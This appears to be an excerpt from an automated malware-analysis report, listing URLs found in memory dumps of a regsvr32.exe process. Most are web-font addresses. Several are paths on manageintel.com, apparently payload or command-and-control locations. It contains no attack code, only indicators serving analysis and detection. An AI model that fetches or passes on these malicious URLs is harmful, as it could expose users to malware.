https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlBduz8A.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2	regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwmRduz8A.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml1	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdv18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2)	regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmlF	regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com	regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkidg18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwkxduz8A.wof	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qN67lqDY.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://isteam.wsimg.com	regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwmhduz8A.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/s	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2	regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwmBduz8A.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmlS	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkido18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwkxduz8A.wof__	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmlc	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/clauseggers/Playfair-Display)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmla	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7psDJT9g.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7rsDJT9g.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/O	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7jsDJT9g.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
